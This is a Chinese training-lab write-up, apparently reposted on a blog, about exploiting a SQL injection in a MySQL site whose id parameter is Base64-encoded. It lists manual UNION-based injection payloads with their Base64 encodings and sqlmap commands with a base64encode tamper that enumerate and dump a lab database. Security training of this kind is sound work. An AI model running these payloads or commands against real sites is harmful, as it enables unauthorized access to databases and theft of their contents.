当前位置: 首页 > news >正文

墨者:SQL注入实战-MySQL

1. 墨者学院:SQL注入实战-MySQL🚀

2. 实训重点目标✨

目标一: 了解sqlmap的使用及其tamper插件的使用;
目标二: 了解base64编码及解码。


3. 解题方向🔍

目标网站的id参数通过Base64编码传输,因此:

  • 手工注入:需将SQL语句Base64编码后注入
  • SQLMAP工具:需使用--tamper=base64encode自动编码Payload(有效载荷:是指攻击者发送给目标系统的恶意数据或代码,用于触发漏洞或执行特定操作)

4. 手工注入方式🎯

4.1 判断字段数⚡

1 order by 3

Base64编码:

MSBvcmRlciBieSAz

!图片占位

4.2 确定回显位⚡

1 and 1=2 union select 1,2

-1 union select 1,2

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDI=
LTEgdW5pb24gc2VsZWN0IDEsMg==

!图片占位

4.3 获取数据库信息⚡

1 and 1=2 union select database(),version()

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBkYXRhYmFzZSgpLHZlcnNpb24oKQ==

!图片占位

4.4 获取系统信息⚡

1 and 1=2 union select @@version_compile_os,user()

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBAQHZlcnNpb25fY29tcGlsZV9vcyx1c2VyKCk=

!图片占位

4.5 爆表名⚡

1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='test'

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSksMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSd0ZXN0Jw==

!图片占位

4.6 爆列名⚡

1 and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name='data'

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDIgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdkYXRhJw==

!图片占位

4.7 获取数据⚡

1 and 1=2 union select group_concat(thekey),2 from data

Base64编码:

MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGhla2V5KSwyIGZyb20gZGF0YQ==

!图片占位


5. SQLMAP工具测试🎯

5.1 获取所有数据库⚡

python sqlmap.py -u "http://124.70.71.251:49181/show.php?id=1" --dbs --batch --tamper=base64encode

!图片占位

5.2 获取test库的表⚡

python sqlmap.py -u "http://124.70.71.251:49181/show.php?id=1" -D test --tables --batch --tamper=base64encode

!图片占位

5.3 获取data表的列⚡

python sqlmap.py -u "http://124.70.71.251:49181/show.php?id=1" -D test -T data --columns --batch --tamper=base64encode

!图片占位

5.4 导出数据⚡

python sqlmap.py -u "http://124.70.71.251:49181/show.php?id=1" -D test -T data -C id,title,main,thekey --dump --batch --tamper=base64encode

!图片占位

5.5 清理缓存⚡

python sqlmap.py --purge

该指令用于清除sqlmap的缓存,因为重启靶场,端口会发生变化,可能获取到的password是之前的数据,详细的sqlmap命令获取如下:

python sqlmap.py -h

5.6 参数说明表⭐

参数作用
--dbs枚举所有数据库
-D test指定目标数据库
--tables枚举表名
-T data指定目标表
--columns枚举列名
--dump导出数据
--tamper=base64encode自动Base64编码Payload

6. 在线工具🔧

  1. 加菲工具:https://www.orcc.top/tools/base64
  2. 锤子工具:https://www.toolhelper.cn/EncodeDecode/Base64
  3. 白盒子工具:https://www.baihezi.com/base64

7. 总结🏁

  1. Base64编码的SQL注入需手工编码或使用tamper插件
  2. 手工注入需逐步验证回显位和数据结构
  3. sqlmap可自动化完成全流程检测

声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

http://www.dtcms.com/a/301938.html

相关文章:

  • uni-datetime-picker兼容ios
  • 【iOS】类和分类的加载过程
  • MySQL有哪些“饮鸩止渴”提高性能的方法?
  • 【Linux篇章】穿越数据迷雾:HTTPS构筑网络安全的量子级护盾,重塑数字信任帝国!
  • 全面解析MySQL(4)——三大范式与联合查询实例教程
  • 【Java Web实战】从零到一打造企业级网上购书网站系统 | 完整开发实录(终)
  • Linux DNS解析2 -- 网关DNS代理的作用
  • CodeMeter授权管理方案助力 PlantStream 引领工业设计新变革
  • 接口测试怎么做?接口测试工具有哪些?
  • JavaWeb 入门:HTML 基础与实战详解(Java 开发者视角)
  • 使用JavaScript实现一个代办事项的小案例
  • 基于亮数据 MCP 的 Trae 智能体,让规模化 Google 数据实时分析触手可及
  • MCP资源管理深度实践:动态数据源集成方案
  • 剑指“CPU飙高”问题
  • 从视觉到智能:RTSP|RTMP推拉流模块如何助力“边缘AI系统”的闭环协同?
  • Entity Framework Core (EF Core) 中状态检测
  • 编程算法:技术创新的引擎与业务增长的核心驱动力
  • 【前端】Tab切换时的数据重置与加载策略技术文档
  • HTB赛季8靶场 - era
  • 可以组成网络的服务器 - 华为OD统一考试(JavaScript 题解)
  • S7-200 SMART 通过本体 RS485 口与 DP01 上传 / 下载程序(网口故障)
  • FastGPT本地构建工作流高级编排(最新4.11.0)
  • Windows 11 下 Anaconda 命令修复指南及常见问题解决
  • Linux应用开发基础知识——LInux学习FreeType编程(七)
  • 【Linux | 网络】传输层(UDP和TCP) - 两万字详细讲解!!
  • 绿算技术携手昇腾发布高性能全闪硬盘缓存设备,推动AI大模型降本增效
  • LeetCode--50.Pow(x,n)
  • MySQL的常用数据类型详解
  • python毕业设计案例:基于python django的抖音数据分析与可视化系统,可视化有echarts,算法包括lstm+朴素贝叶斯算法
  • Java项目:基于SSM框架实现的社区团购管理系统【ssm+B/S架构+源码+数据库+毕业论文+答辩PPT+远程部署】